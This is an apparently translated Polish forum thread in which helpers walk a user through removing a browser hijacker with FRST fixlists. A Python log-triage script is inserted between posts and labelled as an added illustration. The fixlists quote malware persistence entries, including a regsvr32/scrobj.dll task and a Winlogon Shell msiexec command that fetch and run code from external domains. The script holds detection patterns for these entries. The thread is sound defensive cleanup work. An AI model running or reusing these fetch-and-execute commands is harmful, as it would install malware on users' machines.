Elektroda.pl

The Doeye application and fake search engines - request for a fix with FRST

radd91 15 May 2017 14:35 657 7
  • #1 15 May 2017 14:35
    radd91
    Level 11

    Hi,

    Please decipher the FRST logs. A suspicious application called Doeye was installed on the computer. Fake search engines were added in place of the start pages in Chrome and Mozilla. Neither AdwCleaner nor AntiMalware helped.

  • #2 15 May 2017 15:59
    krzychupar
    Level 40

    Open the system Notepad and paste:

    HKU\S-1-5-21-3874262708-2497950410-675821866-1001\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) <==== UWAGA
    Task: {2F9477C7-B70D-4D1C-9F43-08E437E06D46} - System32\Tasks\PCDDataUploadTask => uaclauncher.exe
    Task: {F62C9156-FAF3-48B4-A62A-B0430A03E776} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
    HKLM-x32\...\Run: [] => [X]
    HKU\S-1-5-21-3874262708-2497950410-675821866-1001\...\Run: [background_fault] => C:\Users\dell\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-03] (AVAST Software) <===== UWAGA
    HKU\S-1-5-21-3874262708-2497950410-675821866-1001\...\MountPoints2: {d4dd4c96-7bf4-11e6-bfa5-806e6f6e6963} - "D:\Setup.exe"
    IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
    IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
    IFEO\taskmgr.exe: [Debugger]
    ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
    SearchScopes: HKU\S-1-5-21-3874262708-2497950410-675821866-1001 -> {16C47424-D2AB-47D7-800E-155FE9F67635} URL =
    Edge HomeButtonPage: HKU\S-1-5-21-3874262708-2497950410-675821866-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=...p;uid=TOSHIBAXMQ01ABF050_86J6S1ADSXX86J6S1ADS
    FF NewTab: Mozilla\Firefox\Profiles\ize3gluc.default -> hxxp://www.luckysearch123.com?type=hp&ts=...;z=234dffcb1ee0bbca40289c0gaz2t6c2odmfzfmeq8q
    FF DefaultSearchEngine: Mozilla\Firefox\Profiles\ize3gluc.default -> luck
    FF SearchEngineOrder.1: Mozilla\Firefox\Profiles\ize3gluc.default -> luck
    FF SelectedSearchEngine: Mozilla\Firefox\Profiles\ize3gluc.default -> luck
    FF Homepage: Mozilla\Firefox\Profiles\ize3gluc.default -> hxxp://www.luckysearch123.com?type=hp&ts=...;z=234dffcb1ee0bbca40289c0gaz2t6c2odmfzfmeq8q
    R2 NPASRE; C:\Users\dell\AppData\Local\NPASRE\Snare.dll [830464 2017-05-10] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA
    R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
    S3 dbx; system32\DRIVERS\dbx.sys [X]
    2017-05-15 14:22 - 2017-05-15 14:22 - 00000000 ____D C:\Users\dell\Desktop\FRST-OlderVersion
    2017-05-12 13:50 - 2017-05-15 13:57 - 00000000 ____D C:\AdwCleaner
    2017-05-11 17:02 - 2017-05-11 17:02 - 04102600 _____ C:\Users\dell\Downloads\adwcleaner_6.046 (2).exe
    2017-05-11 16:25 - 2017-05-11 16:25 - 04102600 _____ C:\Users\dell\Downloads\adwcleaner_6.046 (1).exe
    2017-05-11 13:37 - 2017-05-11 15:50 - 00000000 _____ C:\WINDOWS\SysWOW64\3333333
    2017-05-11 13:37 - 2017-05-11 15:50 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111
    2017-05-11 13:36 - 2017-05-11 15:50 - 00000000 _____ C:\WINDOWS\SysWOW64\00
    2017-05-05 10:10 - 2017-05-11 13:40 - 00000000 _____ C:\WINDOWS\SysWOW64\22
    2017-05-05 10:07 - 2017-05-10 09:36 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-05-05 10:07 - 2017-05-05 10:07 - 00000000 ____D C:\WINDOWS\psgo
    2017-04-26 14:37 - 2017-04-26 14:37 - 00000000 ___HD C:\$AV_ASW
    2017-04-25 11:57 - 2017-05-11 15:53 - 00000000 _____ C:\WINDOWS\SysWOW64\33
    2017-04-25 11:51 - 2017-05-11 15:50 - 00000000 _____ C:\WINDOWS\SysWOW64\11
    2016-09-16 11:50 - 2016-09-16 11:52 - 0000106 _____ () C:\ProgramData\{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}.log
    2016-09-16 11:56 - 2016-09-16 11:56 - 0000105 _____ () C:\ProgramData\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB}.log
    2016-09-16 11:54 - 2016-09-16 11:54 - 0000100 _____ () C:\ProgramData\{6BADCD73-E925-46F7-A295-FF2448632728}.log
    2016-09-16 11:56 - 2016-09-16 11:56 - 0000098 _____ () C:\ProgramData\{CEF5334F-B91A-4327-ACAE-AA50DCE3F995}.log
    C:\Users\dell\AppData\Local\background_fault\aswRD.exe
    EmptyTemp:

    Save the file as fixlist.txt and place it in the folder next to FRST.exe.
    Run FRST and click Fix.

  • #3 15 May 2017 18:22
    Kolobos
    Computer specialist

    When that is done, post new FRST logs from a fresh scan.

  • #5 16 May 2017 10:10
    Kolobos
    Computer specialist

    Run this Fixlist.txt with FRST:
    Task: {75321704-8B95-4DD4-B3E9-350698AC9673} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkPGRvw2hpEaQ4rGYcMDQiZjH1MQ04Nah2wdQhZAN4nWq2mjZdMDQkwc== scrobj.dll
    Shortcut: C:\Users\dell\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.)
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.)
    HKU\S-1-5-21-3874262708-2497950410-675821866-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPGR...4rGYcMDQiZjH1MQ04Nah2wdQhZAN4nWq2mjZdMDQkwc== /q
    ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll -> Brak pliku
    FF Extension: (xRocket Toolbar) - C:\Users\dell\AppData\Roaming\Mozilla\Firefox\Profiles\ize3gluc.default\Extensions\arthurj8283@gmail.com [2017-04-27] [Brak podpisu cyfrowego]
    FF SearchPlugin: C:\Users\dell\AppData\Roaming\Mozilla\Firefox\Profiles\ize3gluc.default\searchplugins\luck.xml [2017-04-27]
    FF SearchPlugin: C:\Users\dell\AppData\Roaming\Mozilla\Firefox\Profiles\ize3gluc.default\searchplugins\ourluckysites.xml [2017-05-05]
    FF HKLM-x32\...\Firefox\Extensions: [arthurj8283@gmail.com] - C:\Users\dell\AppData\Roaming\Mozilla\Firefox\Profiles\ize3gluc.default\extensions\arthurj8283@gmail.com
    2017-05-16 09:48 - 2017-05-16 09:48 - 00000000 ____D C:\Users\dell\Desktop\FRST-OlderVersion
    2017-05-12 14:11 - 2017-05-16 09:26 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-05-11 15:53 - 2017-05-11 15:53 - 00000000 ____D C:\Users\dell\AppData\Local\Bagsarah
    2017-05-11 15:50 - 2017-05-11 15:50 - 00000000 ____D C:\Users\Public\Documents\Google
    2017-05-11 15:50 - 2017-05-11 15:50 - 00000000 ____D C:\Program Files (x86)\Bagsarah
    2017-05-11 13:36 - 2017-05-11 13:36 - 00000000 ____D C:\Users\dell\AppData\Local\NPASRE
    2017-05-09 12:28 - 2017-05-12 13:33 - 00000000 _____ C:\WINDOWS\SysWOW64\1111
    2017-05-05 12:01 - 2017-05-16 09:06 - 00000000 ____D C:\Users\dell\AppData\Local\background_fault


    After running it, check whether everything is OK.

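As an added illustration (not code from the thread, from FRST, or from the helpers), here is a small Python triage pass over FRST-style lines of the kind quoted in posts #2 and #5: it flags the persistence mechanisms those fixlists remove (IFEO debugger entries, the Winlogon Shell override, the regsvr32/scrobj.dll scheduled task, an autorun under AppData\Local, the redirected Chrome shortcut, the unsigned service DLL) and the lines FRST already marked. The sample lines are constructed; the domains, the SID and the GUID of the benign task are placeholders.

```python
import re

# Constructed sample lines in the style of the FRST output quoted in posts #2 and #5.
# Domains, the SID and the GUID of the benign task are placeholders, not thread values.
SAMPLE_LINES = [
    r"IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe",
    r"IFEO\taskmgr.exe: [Debugger]",
    r"Task: {75321704-8B95-4DD4-B3E9-350698AC9673} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://example.invalid/?data=PLACEHOLDER scrobj.dll",
    r"HKU\S-1-5-21-PLACEHOLDER-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://example.invalid/?data=PLACEHOLDER /q",
    r"HKU\S-1-5-21-PLACEHOLDER-1001\...\Run: [background_fault] => C:\Users\dell\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-03] (AVAST Software) <===== UWAGA",
    r"Shortcut: C:\Users\dell\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.)",
    r"R2 NPASRE; C:\Users\dell\AppData\Local\NPASRE\Snare.dll [830464 2017-05-10] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA",
    # Two benign-looking lines, so the rules can be seen not firing on everything.
    r"Task: {00000000-0000-0000-0000-000000000000} - System32\Tasks\VendorUpdate => C:\Program Files\Vendor\update.exe",
    r"Shortcut: C:\Users\dell\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)",
]

# (label, regex) pairs. "Brak podpisu cyfrowego" and "UWAGA" are the Polish FRST strings
# seen in the thread; English builds print "File not signed" and "ATTENTION" instead.
RULES = [
    ("IFEO debugger hijack",
     re.compile(r"^IFEO\\.+?: \[Debugger\]", re.I)),
    ("Winlogon Shell override (extra command chained after explorer.exe)",
     re.compile(r"\\Policies\\system: \[Shell\] explorer\.exe,", re.I)),
    ("Scheduled task loading a remote scriptlet via regsvr32/scrobj.dll",
     re.compile(r"^Task: .*regsvr32\.exe .*?/i:h(xx|tt)ps?://.*scrobj\.dll", re.I)),
    ("Run key pointing into user-writable AppData\\Local",
     re.compile(r"\\Run: \[.*\] => .*\\AppData\\Local\\", re.I)),
    ("Chrome shortcut redirected to a non-Google install directory",
     re.compile(r"^Shortcut: .*Chrome\.lnk -> (?!C:\\Program Files( \(x86\))?\\Google\\)", re.I)),
    ("Service loading an unsigned DLL",
     re.compile(r"^[RS]\d .*\.dll .*\[(Brak podpisu cyfrowego|File not signed)\]", re.I)),
    ("Line already flagged by FRST itself",
     re.compile(r"<=+ (UWAGA|ATTENTION)")),
]


def triage(lines):
    """Return [(line, [labels of the rules it tripped])] for every line that tripped one."""
    hits = []
    for line in lines:
        labels = [label for label, rx in RULES if rx.search(line)]
        if labels:
            hits.append((line, labels))
    return hits


if __name__ == "__main__":
    for line, labels in triage(SAMPLE_LINES):
        print(" | ".join(labels), "\n   ", line)
```

The rules are deliberately narrow: a hit is a reason to look at the line, not a verdict, and a clean run over a real log only means none of these particular patterns appeared.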
  • Helpful post
    #7 16 May 2017 11:20
    Kolobos
    Computer specialist

    Restore Edge's default settings; the logs show no Edge entries. Probably because almost nobody uses that "browser".

  • #8 27 Dec 2017 15:55
    radd91
    Level 11

    Thanks, problem solved :)
